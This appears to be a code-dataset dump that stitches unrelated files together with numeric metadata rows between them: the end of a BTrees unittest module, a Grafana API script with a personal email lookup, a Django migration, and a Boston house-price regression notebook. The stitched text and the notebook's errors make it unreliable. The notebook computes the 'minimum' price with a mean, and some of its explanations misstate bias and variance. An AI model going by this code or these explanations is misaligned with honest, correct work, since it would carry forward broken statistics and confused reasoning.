class IFBTreePyConflictTests(MappingConflictTestBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFBTreePy
return IFBTreePy
class IFBucketConflictTests(MappingConflictTestBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFBucket
return IFBucket
class IFBucketPyConflictTests(MappingConflictTestBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFBucketPy
return IFBucketPy
class IFTreeSetConflictTests(SetConflictTestBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFTreeSet
return IFTreeSet
class IFTreeSetPyConflictTests(SetConflictTestBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFTreeSetPy
return IFTreeSetPy
class IFSetConflictTests(SetConflictTestBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFSet
return IFSet
class IFSetPyConflictTests(SetConflictTestBase, unittest.TestCase):
def _getTargetClass(self):
from BTrees.IFBTree import IFSetPy
return IFSetPy
class IFModuleTest(ModuleTest, unittest.TestCase):
prefix = 'IF'
def _getModule(self):
import BTrees
return BTrees.IFBTree
def _getInterface(self):
import BTrees.Interfaces
return BTrees.Interfaces.IIntegerFloatBTreeModule
def test_suite():
return unittest.TestSuite((
unittest.makeSuite(IFBTreeInternalKeyTest),
unittest.makeSuite(IFBTreePyInternalKeyTest),
unittest.makeSuite(IFTreeSetInternalKeyTest),
unittest.makeSuite(IFTreeSetPyInternalKeyTest),
unittest.makeSuite(IFBucketTest),
unittest.makeSuite(IFBucketPyTest),
unittest.makeSuite(IFTreeSetTest),
unittest.makeSuite(IFTreeSetPyTest),
unittest.makeSuite(IFSetTest),
unittest.makeSuite(IFSetPyTest),
unittest.makeSuite(IFBTreeTest),
unittest.makeSuite(IFBTreePyTest),
unittest.makeSuite(TestIFBTrees),
unittest.makeSuite(TestIFBTreesPy),
unittest.makeSuite(TestIFMultiUnion),
unittest.makeSuite(TestIFMultiUnionPy),
unittest.makeSuite(PureIF),
unittest.makeSuite(PureIFPy),
unittest.makeSuite(IFBTreeConflictTests),
unittest.makeSuite(IFBTreePyConflictTests),
unittest.makeSuite(IFBucketConflictTests),
unittest.makeSuite(IFBucketPyConflictTests),
unittest.makeSuite(IFTreeSetConflictTests),
unittest.makeSuite(IFTreeSetPyConflictTests),
unittest.makeSuite(IFSetConflictTests),
unittest.makeSuite(IFSetPyConflictTests),
unittest.makeSuite(IFModuleTest),
))
| 28.076517 | 78 | 0.699558 | 1,025 | 10,641 | 7.214634 | 0.152195 | 0.068966 | 0.114943 | 0.15551 | 0.564841 | 0.529412 | 0.518864 | 0.507776 | 0.496417 | 0.451116 | 0 | 0.004435 | 0.216051 | 10,641 | 378 | 79 | 28.150794 | 0.882043 | 0.045484 | 0 | 0.48583 | 0 | 0 | 0.0004 | 0 | 0 | 0 | 0 | 0 | 0.020243 | 1 | 0.230769 | false | 0 | 0.271255 | 0.012146 | 0.825911 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
be72e9e34ec5cb9cde132a5ad4aa331d6e3ffa50 | 627 | py | Python | action-grafana-app-dashboards/test.py | asksven/self-services-operations | 612a12a59f6b4a0a65030208001f302c5dc28191 | [
"MIT"
] | null | null | null | action-grafana-app-dashboards/test.py | asksven/self-services-operations | 612a12a59f6b4a0a65030208001f302c5dc28191 | [
"MIT"
] | null | null | null | action-grafana-app-dashboards/test.py | asksven/self-services-operations | 612a12a59f6b4a0a65030208001f302c5dc28191 | [
"MIT"
] | null | null | null | from grafana_api.grafana_face import GrafanaFace
import os
print(os.environ['GRAFANA_HOST'])
# grafana_api = GrafanaFace(protocol='https', auth=os.environ['GRAFANA_API_KEY'], host=os.environ['GRAFANA_HOST'])
grafana_api = GrafanaFace(auth=(os.environ['GRAFANA_USER'], os.environ['GRAFANA_PWD']),protocol='https', host=os.environ['GRAFANA_HOST'])
print('Logged in')
# Find a user by email
user = grafana_api.users.find_user('sven.knispel@gmail.com')
print(user)
source_folder_id = '46'
res = grafana_api.search.search_dashboards(folder_ids=source_folder_id)
print(res)
for dashboard in res:
print(dashboard["title"])
| 28.5 | 137 | 0.76874 | 93 | 627 | 4.967742 | 0.408602 | 0.12987 | 0.207792 | 0.12987 | 0.238095 | 0.177489 | 0.177489 | 0 | 0 | 0 | 0 | 0.003484 | 0.08453 | 627 | 21 | 138 | 29.857143 | 0.801394 | 0.212121 | 0 | 0 | 0 | 0 | 0.183673 | 0.044898 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.416667 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
be73d0a7f855851924b9c82a791a53c92d7ed885 | 727 | py | Python | overtrick/almanac/migrations/0001_initial.py | katemakescode/overtrick | d5a324e4fe28e82de9703e80c12891a5c2ec4dbe | [
"MIT"
] | null | null | null | overtrick/almanac/migrations/0001_initial.py | katemakescode/overtrick | d5a324e4fe28e82de9703e80c12891a5c2ec4dbe | [
"MIT"
] | null | null | null | overtrick/almanac/migrations/0001_initial.py | katemakescode/overtrick | d5a324e4fe28e82de9703e80c12891a5c2ec4dbe | [
"MIT"
] | null | null | null | # Generated by Django 3.1.5 on 2021-01-24 20:31
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Session',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('club', models.CharField(max_length=20)),
('date', models.DateField()),
('time', models.CharField(max_length=10)),
('event', models.CharField(max_length=40)),
],
options={
'ordering': ['-date'],
},
),
]
| 25.964286 | 114 | 0.522696 | 69 | 727 | 5.42029 | 0.695652 | 0.120321 | 0.144385 | 0.192513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043659 | 0.338377 | 727 | 27 | 115 | 26.925926 | 0.733888 | 0.061898 | 0 | 0 | 1 | 0 | 0.060294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
be8e5a8ed0fd7055d4dcbcb100179c1c422dec5f | 44,539 | py | Python | relancer-exp/original_notebooks/schirmerchad_bostonhoustingmlnd/predicting-boston-house-prices.py | Chenguang-Zhu/relancer | bf1a175b77b7da4cff12fbc5de17dd55246d264d | [
"Apache-2.0"
] | 1 | 2022-03-05T22:27:49.000Z | 2022-03-05T22:27:49.000Z | relancer-exp/original_notebooks/schirmerchad_bostonhoustingmlnd/predicting-boston-house-prices.py | Chenguang-Zhu/relancer | bf1a175b77b7da4cff12fbc5de17dd55246d264d | [
"Apache-2.0"
] | null | null | null | relancer-exp/original_notebooks/schirmerchad_bostonhoustingmlnd/predicting-boston-house-prices.py | Chenguang-Zhu/relancer | bf1a175b77b7da4cff12fbc5de17dd55246d264d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# ## Getting Started
# In this project, we will evaluate the performance and predictive power of a model that has been trained and tested on data collected from homes in suburbs of Boston, Massachusetts. A model trained on this data that is seen as a *good fit* could then be used to make certain predictions about a home — in particular, its monetary value. This model would prove to be invaluable for someone like a real estate agent who could make use of such information on a daily basis.
#
# The dataset for this project originates from the [UCI Machine Learning Repository](https://archive.ics.uci.edu/ml/datasets/Housing). The Boston housing data was collected in 1978 and each of the 506 entries represent aggregated data about 14 features for homes from various suburbs in Boston, Massachusetts. For the purposes of this project, the following preprocessing steps have been made to the dataset:
# - 16 data points have an `'MEDV'` value of 50.0. These data points likely contain **missing or censored values** and have been removed.
# - 1 data point has an `'RM'` value of 8.78. This data point can be considered an **outlier** and has been removed.
# - The features `'RM'`, `'LSTAT'`, `'PTRATIO'`, and `'MEDV'` are essential. The remaining **non-relevant features** have been excluded.
# - The feature `'MEDV'` has been **multiplicatively scaled** to account for 35 years of market inflation.
#
# Run the code cell below to load the Boston housing dataset, along with a few of the necessary Python libraries required for this project. You will know the dataset loaded successfully if the size of the dataset is reported.
# In[ ]:
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.cross_validation import ShuffleSplit
# Pretty display for notebooks
print()
# Input data files are available in the "../../../input/schirmerchad_bostonhoustingmlnd/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
from subprocess import check_output
print(check_output(["ls", "../../../input/schirmerchad_bostonhoustingmlnd"]).decode("utf8"))
# In[ ]:
# Load the Boston housing dataset
data = pd.read_csv("../../../input/schirmerchad_bostonhoustingmlnd/housing.csv")
prices = data['MEDV']
features = data.drop('MEDV', axis = 1)
data.head()
# ## Data Exploration
# In this first section of this project, we will make a cursory investigation about the Boston housing data and provide our observations. Familiarizing ourself with the data through an explorative process is a fundamental practice to help us better understand and justify our results.
#
# Since the main goal of this project is to construct a working model which has the capability of predicting the value of houses, we will need to separate the dataset into **features** and the **target variable**. The **features**, `'RM'`, `'LSTAT'`, and `'PTRATIO'`, give us quantitative information about each data point. The **target variable**, `'MEDV'`, will be the variable we seek to predict. These are stored in `features` and `prices`, respectively.
# ### Implementation: Calculate Statistics
# For our very first coding implementation, we will calculate descriptive statistics about the Boston housing prices. Since `numpy` has already been imported for us, use this library to perform the necessary calculations. These statistics will be extremely important later on to analyze various prediction results from the constructed model.
#
# In the code cell below, we will need to implement the following:
# - Calculate the minimum, maximum, mean, median, and standard deviation of `'MEDV'`, which is stored in `prices`.
# - Store each calculation in their respective variable.
# In[ ]:
# TODO: Minimum price of the data
minimum_price = np.mean(prices)
# TODO: Maximum price of the data
maximum_price = np.max(prices)
# TODO: Mean price of the data
mean_price = np.mean(prices)
# TODO: Median price of the data
median_price = np.median(prices)
# TODO: Standard deviation of prices of the data
std_price = np.std(prices)
# Show the calculated statistics
print("Statistics for Boston housing dataset:\n")
print("Minimum price: ${:,.2f}".format(minimum_price))
print("Maximum price: ${:,.2f}".format(maximum_price))
print("Mean price: ${:,.2f}".format(mean_price))
print("Median price ${:,.2f}".format(median_price))
print("Standard deviation of prices: ${:,.2f}".format(std_price))
# ### Question 1 - Feature Observation
# As a reminder, we are using three features from the Boston housing dataset: `'RM'`, `'LSTAT'`, and `'PTRATIO'`. For each data point (neighborhood):
# - `'RM'` is the average number of rooms among homes in the neighborhood.
# - `'LSTAT'` is the percentage of homeowners in the neighborhood considered "lower class" (working poor).
# - `'PTRATIO'` is the ratio of students to teachers in primary and secondary schools in the neighborhood.
#
#
# ** Using your intuition, for each of the three features above, do you think that an increase in the value of that feature would lead to an **increase** in the value of `'MEDV'` or a **decrease** in the value of `'MEDV'`? Justify your answer for each.**
#
# **Hint:** This problem can phrased using examples like below.
# * Would you expect a home that has an `'RM'` value(number of rooms) of 6 be worth more or less than a home that has an `'RM'` value of 7?
# * Would you expect a neighborhood that has an `'LSTAT'` value(percent of lower class workers) of 15 have home prices be worth more or less than a neighborhood that has an `'LSTAT'` value of 20?
# * Would you expect a neighborhood that has an `'PTRATIO'` value(ratio of students to teachers) of 10 have home prices be worth more or less than a neighborhood that has an `'PTRATIO'` value of 15?
# **Answer: ** In my opinion, the value of 'MEDV' will be dependent on these 3 features in the following way:
#
# 1) **RM** - The more the value of RM, the more will be the value of 'MEDV'. Because it's pretty evident that with increase in the number of rooms, the price of the house will increase.
#
# 2) **LSTAT** - The more the value of LSTAT, the less will be the value of 'MEDV'. Because with increase in the percentage of "lower class" homeowners in the neighbourhood, the crime rate in the neighbourhood may increase. Even though LSTAT doesn't have a causal effect on the crime rate in the neighbourhood, they are likely to be positively correlated. One more factor is if there are greater percentages of "lower class" homeowners in the neighbourhood, then more likely very expensive real estate owners will not build their housing complexes in that region as most of the people will not be able to afford it. So in average, the houses in that region will be cheaper.
#
# 3) **PTRATIO** - The lesser the value of PTRATIO, the more will be the value of 'MEDV'. Because if the students to teacher ratio is low, then that means individual students gets much more attention from the students as opposed to a region where this ratio is high. Over there, as the number of students will be much higher than the number of teachers, teachers will not be able to attend to students individually everytime and hence this may affect the education of the students. So regions with a low PTRATIO will have higher prices for houses.
# ## Initial Visualization
# In[ ]:
# Using pyplot
import matplotlib.pyplot as plt
plt.figure(figsize=(20, 5))
# i: index
for i, col in enumerate(features.columns):
# 3 plots here hence 1, 3
plt.subplot(1, 3, i+1)
x = data[col]
y = prices
plt.plot(x, y, 'o')
# Create regression line
plt.plot(np.unique(x), np.poly1d(np.polyfit(x, y, 1))(np.unique(x)))
plt.title(col)
plt.xlabel(col)
plt.ylabel('prices')
# ----
#
# ## Developing a Model
# In this second section of the project, we will develop the tools and techniques necessary for a model to make a prediction. Being able to make accurate evaluations of each model's performance through the use of these tools and techniques helps to greatly reinforce the confidence in our predictions.
# ### Implementation: Define a Performance Metric
# It is difficult to measure the quality of a given model without quantifying its performance over training and testing. This is typically done using some type of performance metric, whether it is through calculating some type of error, the goodness of fit, or some other useful measurement. For this project, we will be calculating the [*coefficient of determination*](http://stattrek.com/statistics/dictionary.aspx?definition=coefficient_of_determination), R<sup>2</sup>, to quantify our model's performance. The coefficient of determination for a model is a useful statistic in regression analysis, as it often describes how "good" that model is at making predictions.
#
# The values for R<sup>2</sup> range from 0 to 1, which captures the percentage of squared correlation between the predicted and actual values of the **target variable**. A model with an R<sup>2</sup> of 0 is no better than a model that always predicts the *mean* of the target variable, whereas a model with an R<sup>2</sup> of 1 perfectly predicts the target variable. Any value between 0 and 1 indicates what percentage of the target variable, using this model, can be explained by the **features**. _A model can be given a negative R<sup>2</sup> as well, which indicates that the model is **arbitrarily worse** than one that always predicts the mean of the target variable._
#
# For the `performance_metric` function in the code cell below, we will need to implement the following:
# - Use `r2_score` from `sklearn.metrics` to perform a performance calculation between `y_true` and `y_predict`.
# - Assign the performance score to the `score` variable.
# In[ ]:
# TODO: Import 'r2_score'
def performance_metric(y_true, y_predict):
""" Calculates and returns the performance score between true and predicted values based on the metric chosen. """
# TODO: Calculate the performance score between 'y_true' and 'y_predict'
from sklearn.metrics import r2_score
score = r2_score(y_true, y_predict)
# Return the score
return score
# ### Question 2 - Goodness of Fit
# Assume that a dataset contains five data points and a model made the following predictions for the target variable:
#
# | True Value | Prediction |
# | :----------: | :--------: |
# | 3.0 | 2.5 |
# | -0.5 | 0.0 |
# | 2.0 | 2.1 |
# | 7.0 | 7.8 |
# | 4.2 | 5.3 |
#
# Run the code cell below to use the `performance_metric` function and calculate this model's coefficient of determination.
# In[ ]:
# Calculate the performance of this model
score = performance_metric([3, -0.5, 2, 7, 4.2], [2.5, 0.0, 2.1, 7.8, 5.3])
print("Model has a coefficient of determination, R^2, of {:.3f}.".format(score))
# ### Visualization
# In[ ]:
import numpy as np
import matplotlib.pyplot as plt
print()
true, pred = [3, -0.5, 2, 7, 4.2], [2.5, 0.0, 2.1, 7.8, 5.3]
#Plot true values
true_handle = plt.scatter(true, true, alpha=0.6, color='blue', label='true')
#Reference line
fit = np.poly1d(np.polyfit(true,true,1))
lims = np.linspace(min(true) - 1, max(true) + 1)
plt.plot(lims, fit(lims), alpha=0.3, color='black')
#Plot predicted values
pred_handle = plt.scatter(true, pred, alpha=0.6, color='red', label='predicted')
#Legend and show
plt.legend(handles=[true_handle,pred_handle], loc='upper left')
print()
# * Would you consider this model to have successfully captured the variation of the target variable?
# * Why or why not?
#
# ** Hint: ** The R2 score is the proportion of the variance in the dependent variable that is predictable from the independent variable. In other words:
# * R2 score of 0 means that the dependent variable cannot be predicted from the independent variable.
# * R2 score of 1 means the dependent variable can be predicted from the independent variable.
# * R2 score between 0 and 1 indicates the extent to which the dependent variable is predictable. An
# * R2 score of 0.40 means that 40 percent of the variance in Y is predictable from X.
# **Answer:** Yes, this model has successfully captured the variation of the target variable. This is because we are getting a very high R2 value of 0.923. That means 92.3% of the variance in the True Value is predictable from the Prediction. As this is a very high percentage, we can call this model to be a successful model.
#
# The only drawback is there are only 5 datapoints here. So this might not be statistically significant. Another caveat is that whether the model is successful also depends largely on the application. So for some projects 0.923 is sufficient, whereas for others it could be a low score.
# ### Implementation: Shuffle and Split Data
# Our next implementation requires that we take the Boston housing dataset and split the data into training and testing subsets. Typically, the data is also shuffled into a random order when creating the training and testing subsets to remove any bias in the ordering of the dataset.
#
# For the code cell below, we will need to implement the following:
# - Use `train_test_split` from `sklearn.cross_validation` to shuffle and split the `features` and `prices` data into training and testing sets.
# - Split the data into 80% training and 20% testing.
# - Set the `random_state` for `train_test_split` to a value of your choice. This ensures results are consistent.
# - Assign the train and testing splits to `X_train`, `X_test`, `y_train`, and `y_test`.
# In[ ]:
# TODO: Import 'train_test_split'
from sklearn import cross_validation
# TODO: Shuffle and split the data into training and testing subsets
X_train, X_test, y_train, y_test = cross_validation.train_test_split(features, prices, test_size = 0.2, random_state = 42)
# Success
print("Training and testing split was successful.")
# ### Question 3 - Training and Testing
#
# * What is the benefit to splitting a dataset into some ratio of training and testing subsets for a learning algorithm?
#
# **Hint:** Think about how overfitting or underfitting is contingent upon how splits on data is done.
# **Answer: ** A possible alternative to splitting a dataset into training and testing data would be to train and test on the same data. But that creates a problem. Here there is a very high chance of getting a high variance model which may eventually lead to a 100% accuracy rate with addition of new features, but that's only because it is overfitting the data. It has developed such a complex model that it will have limited or no ability to generalize data and so when we use that model on unknown data, it will give us very very low accuracy. So to avoid that, we can split the data into training and testing sets and train the model on the training data. Then the testing accuracy is a much better estimate than the training accuracy.
#
# But then, the split might create a problem too. If we have a very limited dataset, then even if we take out a small sample of it as testing data, then also , we are losing a portion of the data. So there's an inherent trade off here which might cause underfitting due to limited datasets. This is where we can take advantage of K-fold cross validation where we divide all the datapoints into k number of bins and then run k separate learning experiments. In each of those, we pick one of those k subsets as our testing set and the remaining k-1 bins as our training sets. This is how we can maximize the machine's learning experiment.
# ----
#
# ## Analyzing Model Performance
# In this third section of the project, we'll take a look at several models' learning and testing performances on various subsets of training data. Additionally, we'll investigate one particular algorithm with an increasing `'max_depth'` parameter on the full training set to observe how model complexity affects performance. Graphing our model's performance based on varying criteria can be beneficial in the analysis process, such as visualizing behavior that may not have been apparent from the results alone.
# ### Learning Curves
# The following code cell produces four graphs for a decision tree model with different maximum depths. Each graph visualizes the learning curves of the model for both training and testing as the size of the training set is increased. Note that the shaded region of a learning curve denotes the uncertainty of that curve (measured as the standard deviation). The model is scored on both the training and testing sets using R<sup>2</sup>, the coefficient of determination.
#
# Run the code cell below and use these graphs to answer the following question.
# In[ ]:
#Define the necessary functions for plotting
###########################################
# Suppress matplotlib user warnings
# Necessary for newer version of matplotlib
import warnings
warnings.filterwarnings("ignore", category = UserWarning, module = "matplotlib")
#
# Display inline matplotlib plots with IPython
from IPython import get_ipython
print()
###########################################
import matplotlib.pyplot as pl
import numpy as np
import sklearn.learning_curve as curves
from sklearn.tree import DecisionTreeRegressor
from sklearn.cross_validation import ShuffleSplit, train_test_split
def ModelLearning(X, y):
""" Calculates the performance of several models with varying sizes of training data. The learning and testing scores for each model are then plotted. """
# Create 10 cross-validation sets for training and testing
cv = ShuffleSplit(X.shape[0], n_iter = 10, test_size = 0.2, random_state = 0)
# Generate the training set sizes increasing by 50
train_sizes = np.rint(np.linspace(1, X.shape[0]*0.8 - 1, 9)).astype(int)
# Create the figure window
fig = pl.figure(figsize=(10,7))
# Create three different models based on max_depth
for k, depth in enumerate([1,3,6,10]):
# Create a Decision tree regressor at max_depth = depth
regressor = DecisionTreeRegressor(max_depth = depth)
# Calculate the training and testing scores
sizes, train_scores, test_scores = curves.learning_curve(regressor, X, y, cv = cv, train_sizes = train_sizes, scoring = 'r2')
# Find the mean and standard deviation for smoothing
train_std = np.std(train_scores, axis = 1)
train_mean = np.mean(train_scores, axis = 1)
test_std = np.std(test_scores, axis = 1)
test_mean = np.mean(test_scores, axis = 1)
# Subplot the learning curve
ax = fig.add_subplot(2, 2, k+1)
ax.plot(sizes, train_mean, 'o-', color = 'r', label = 'Training Score')
ax.plot(sizes, test_mean, 'o-', color = 'g', label = 'Testing Score')
ax.fill_between(sizes, train_mean - train_std, train_mean + train_std, alpha = 0.15, color = 'r')
ax.fill_between(sizes, test_mean - test_std, test_mean + test_std, alpha = 0.15, color = 'g')
# Labels
ax.set_title('max_depth = %s'%(depth))
ax.set_xlabel('Number of Training Points')
ax.set_ylabel('Score')
ax.set_xlim([0, X.shape[0]*0.8])
ax.set_ylim([-0.05, 1.05])
# Visual aesthetics
ax.legend(bbox_to_anchor=(1.05, 2.05), loc='lower left', borderaxespad = 0.)
fig.suptitle('Decision Tree Regressor Learning Performances', fontsize = 16, y = 1.03)
fig.tight_layout()
#fig.show()
def ModelComplexity(X, y):
""" Calculates the performance of the model as model complexity increases. The learning and testing errors rates are then plotted. """
# Create 10 cross-validation sets for training and testing
cv = ShuffleSplit(X.shape[0], n_iter = 10, test_size = 0.2, random_state = 0)
# Vary the max_depth parameter from 1 to 10
max_depth = np.arange(1,11)
# Calculate the training and testing scores
train_scores, test_scores = curves.validation_curve(DecisionTreeRegressor(), X, y, param_name = "max_depth", param_range = max_depth, cv = cv, scoring = 'r2')
# Find the mean and standard deviation for smoothing
train_mean = np.mean(train_scores, axis=1)
train_std = np.std(train_scores, axis=1)
test_mean = np.mean(test_scores, axis=1)
test_std = np.std(test_scores, axis=1)
# Plot the validation curve
pl.figure(figsize=(7, 5))
pl.title('Decision Tree Regressor Complexity Performance')
pl.plot(max_depth, train_mean, 'o-', color = 'r', label = 'Training Score')
pl.plot(max_depth, test_mean, 'o-', color = 'g', label = 'Validation Score')
pl.fill_between(max_depth, train_mean - train_std, train_mean + train_std, alpha = 0.15, color = 'r')
pl.fill_between(max_depth, test_mean - test_std, test_mean + test_std, alpha = 0.15, color = 'g')
# Visual aesthetics
pl.legend(loc = 'lower right')
pl.xlabel('Maximum Depth')
pl.ylabel('Score')
pl.ylim([-0.05,1.05])
#pl.show()
def PredictTrials(X, y, fitter, data):
""" Performs trials of fitting and predicting data. """
# Store the predicted prices
prices = []
for k in range(10):
# Split the data
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = k)
# Fit the data
reg = fitter(X_train, y_train)
# Make a prediction
pred = reg.predict([data[0]])[0]
prices.append(pred)
# Result
print("Trial {}: ${:,.2f}".format(k+1, pred))
# Display price range
print("\nRange in prices: ${:,.2f}".format(max(prices) - min(prices)))
# In[ ]:
# Produce learning curves for varying training set sizes and maximum depths
ModelLearning(features, prices)
# ### Question 4 - Learning the Data
# * Choose one of the graphs above and state the maximum depth for the model.
# * What happens to the score of the training curve as more training points are added? What about the testing curve?
# * Would having more training points benefit the model?
#
# **Hint:** Are the learning curves converging to particular scores? Generally speaking, the more data you have, the better. But if your training and testing curves are converging with a score above your benchmark threshold, would this be necessary?
# Think about the pros and cons of adding more training points based on if the training and testing curves are converging.
# Answer:
#
# A) max_depth = 1 (High Bias Scenario): We see that initially the Testing Score(green line) increases with increase in number of training points. But then it plateaus at a very low accuracy score of 0.4 or 40% and increase in number of training points have no effect. This shows that the model does not generalize well on unseen data. On the other hand, the Training Score(red line) decreases with increase in the number of training points and gets saturated at a score of approximately 0.4 or 40%. This shows that the model is actually underfitting the data and is not complex enough. In this scenario, adding more training points will not benefit the model. Instead, its complexity should be increased for better fitting the dataset.
#
# B)max_depth = 3 (Best scenario): Testing Score(green line) increases with increase in training points. It reaches a pretty high score of 0.8 and so we can see the model generalizes well. The Training Score(red line) decreases slightly and reaches 0.8 and stays constant. So we see it fits the model well and reaches a pretty high score. The testing score has two significant phases where the rates of change are different. One is the positive rate of change which goes on uptil approximately 200 training points (within this positive rate of change, we again observe two different rates. One is uptil 50 training points where the rate of increase is very high.The other is between 50 - 200 where the rate of increase is much lower.) and the other is the region where it plateaus with no/very little rate of change which is beyond 200 training points. So if we are below 200 training points, adding more training points will definitely improve the score but beyond that adding more training points will not be very useful as the rate plateaus.
#
# C) max_depth = 6 (High Variance Scenario): Testing Score(green line) increases with increase in training points and reaches 0.7. Even though this is not a bad accuracy, it is not generalizing the data as well as max_depth = 3. The Training Score(red line) decrease ever so slightly and stays at 0.9 which is a big sign that it is overfitting the data. It is a High Variance problem. Here also, the testing score show a similar behaviour as the previous one (it plateaus after 200 training points). So once again, we will get an improvement in the testing score by adding more training points when the nuber of training points is less than 200, but after that adding more training points will not benefit us much.
#
# D) max_depth = 10 (Higher Variance Scenario): Testing Score(green line) increases with increase in training points and reaches 0.7. So same problem as the previous one. It is not generalizing the data as well as scenario B). The Training Score(red line) remains constant throughout showing a perfect accuracy of 100% or a score of 1 which tells us it is definitely overfitting the data. This is also a very High Variance problem. Once again the curve show exactly the same behaviour where adding more training points upto 200 will increase the score but not beyond that.
#
#
# ### Complexity Curves
# The following code cell produces a graph for a decision tree model that has been trained and validated on the training data using different maximum depths. The graph produces two complexity curves — one for training and one for validation. Similar to the **learning curves**, the shaded regions of both the complexity curves denote the uncertainty in those curves, and the model is scored on both the training and validation sets using the `performance_metric` function.
#
# ** Run the code cell below and use this graph to answer the following two questions Q5 and Q6. **
# In[ ]:
ModelComplexity(X_train, y_train)
# ### Question 5 - Bias-Variance Tradeoff
# * When the model is trained with a maximum depth of 1, does the model suffer from high bias or from high variance?
# * How about when the model is trained with a maximum depth of 10? What visual cues in the graph justify your conclusions?
#
# **Hint:** High bias is a sign of underfitting(model is not complex enough to pick up the nuances in the data) and high variance is a sign of overfitting(model is by-hearting the data and cannot generalize well). Think about which model(depth 1 or 10) aligns with which part of the tradeoff.
# Answer: We can easily recognize a problem related to High Bias or High Variance by simply looking at the graph of training and testing scores.
#
# If there is High Bias, there will be very little gap between Training and Testing Scores. This is because in High Bias scenarios, the model underfits the data and also cannot generalize the data well resulting in both curves converging to a low score.
#
# If there is High Variance, there will be a large gap between the Training and Testing Scores. This is because in High Variance model, even though the model fits well, it does not generalize well as a result of overfitting. This leads to a high Training Score but a relatively low Testing/Validation Score.
#
# A) Maximum Depth = 1 (High Bias): Here both Training and Testing Scores are low. So the model is not fitting well and so it is not generalizing well. Thus the two curves are very close to each other and hence this is a High Bias situation.
#
# B) Maximum Depth = 10 (High Variance): Here there is a huge gap between Training and Testing Scores. The Training score is almost perfect at 1, but the testing score is much low at around 0.7. So the model is overfitting and hence does not generalize well resulting in a lower Validation Score. So this is a High Variance situation with the curves being far apart.
# ### Question 6 - Best-Guess Optimal Model
# * Which maximum depth do you think results in a model that best generalizes to unseen data?
# * What intuition lead you to this answer?
#
# ** Hint: ** Look at the graph above Question 5 and see where the validation scores lie for the various depths that have been assigned to the model. Does it get better with increased depth? At what point do we get our best validation score without overcomplicating our model? And remember, Occams Razor states "Among competing hypotheses, the one with the fewest assumptions should be selected."
# Answer: Maximum Depth = 4
#
# The validation score seems to plateau here. So this is the highest validation score we can get i.e best generalization of unseen data.
#
# The gap between the Training Score and the Validation Score is not significantly large here too which indicates a High Variance Situation.
# -----
#
# ## Evaluating Model Performance
# In this final section of the project, we will construct a model and make a prediction on the client's feature set using an optimized model from `fit_model`.
# ### Question 7 - Grid Search
# * What is the grid search technique?
# * How it can be applied to optimize a learning algorithm?
#
# **Answer: ** The Grid search technique allows us to define a grid of the hyperparameters for a specific classifier and then the Grid search technique exhaustively tries out every possible combinations of the hyperparameters values in order to find the best model. After that we can use cross validation techniques like K-fold cross validation or Stratified Shuffle Split to find the highest accuracy by using the hyperparameters suggested by Grid Search technique optimizing the learning algorithm.
#
# ** Point to Note: ** Due to its exhaustive search nature, grid search can be computationally expensive, especially when data size is large and model is complicated. Sometimes we resort to randomized search in this case to search only some combinations of the parameters.
# (http://scikit-learn.org/stable/modules/generated/sklearn.grid_search.RandomizedSearchCV.html#sklearn-grid-search-randomizedsearchcv)
# ### Question 8 - Cross-Validation
#
# * What is the k-fold cross-validation training technique?
#
# * What benefit does this technique provide for grid search when optimizing a model?
#
# **Hint:** When explaining the k-fold cross validation technique, be sure to touch upon what 'k' is, how the dataset is split into different parts for training and testing and the number of times it is run based on the 'k' value.
#
# When thinking about how k-fold cross validation helps grid search, think about the main drawbacks of grid search which are hinged upon **using a particular subset of data for training or testing** and how k-fold cv could help alleviate that. You can refer to the [docs](http://scikit-learn.org/stable/modules/cross_validation.html#cross-validation) for your answer.
# **Answer: ** In K-fold cross validation technique, we partition the data into k-bins of equal size. After that we run k separate learning experiments. In each of those, we pick one of the k subsets as our testing set. The remaining k-1 bins are put together into the training set. Then we train our machine learning algorithm and just like before test the performance on the testing set. The key thing in cross validation is we run this multiple times (k times) and then we average the k different testing set performances for the k different hold out sets. So we average the test results from those k experiments. So obviously this takes more computation time as now we have to run k separate learning experiments, but the assessment of the learning algorithm will be more accurate.
#
# If we run Grid Search without running a cross validation set, we will have different sets of optimal hyperparameters because without a cross validation set, the estimate of out-of-sample performance would have a high variance.
#
